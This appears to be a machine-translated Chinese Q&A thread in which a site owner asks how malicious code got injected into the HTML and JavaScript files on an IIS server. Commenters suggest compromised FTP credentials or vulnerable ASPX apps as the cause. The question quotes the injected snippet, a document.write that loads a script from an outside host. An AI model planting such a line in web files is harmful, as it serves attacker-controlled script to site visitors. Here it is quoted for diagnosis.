攻击HTML和Javascript文件

我在我的IIS服务器中有很多javascript和html文件。几天前，一些奇怪的代码注入到文件中。下面的代码。攻击HTML和Javascript文件

/*ec8243*/ 
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>'); 
/*/ec8243*/

我从所有的javascript文件中删除了这段代码。请帮助我了解如何将这些代码注入到服务器中的文件中。我经历了XSS攻击。但我找不到任何东西。提前致谢。

2014-04-04 uvinod

这些脚本是在哪里出现到底是什么？他们来自数据库还是硬编码在你的html文件中？ – aurbano

有代码被硬编码到我的HTML和JavaScript文件在服务器中。 – uvinod

没有服务器日志和更多信息很难说，但是您的ftp凭据可能会受到影响。 – aurbano

如果您只有静态的HTML和JS文件并且没有附加数据库，那么您的服务器可能会受到影响。要么你的FTP密码很薄弱，要么你重复使用你的电子邮件地址的密码。

或者您的服务器或访问服务器的计算机感染了一些恶意软件。

2014-04-04 08:53:48 Mathias

我在服务器中有aspx和php文件和数据库连接。 – uvinod

你运行的是什么aspx应用程序？他们是最新的吗？或者他们是自己写的？有可能，他们有安全问题，攻击者可以修改你的文件。 – Mathias

这是一个网站。所以我一直保持aspx作为服务器端脚本。 – uvinod

回答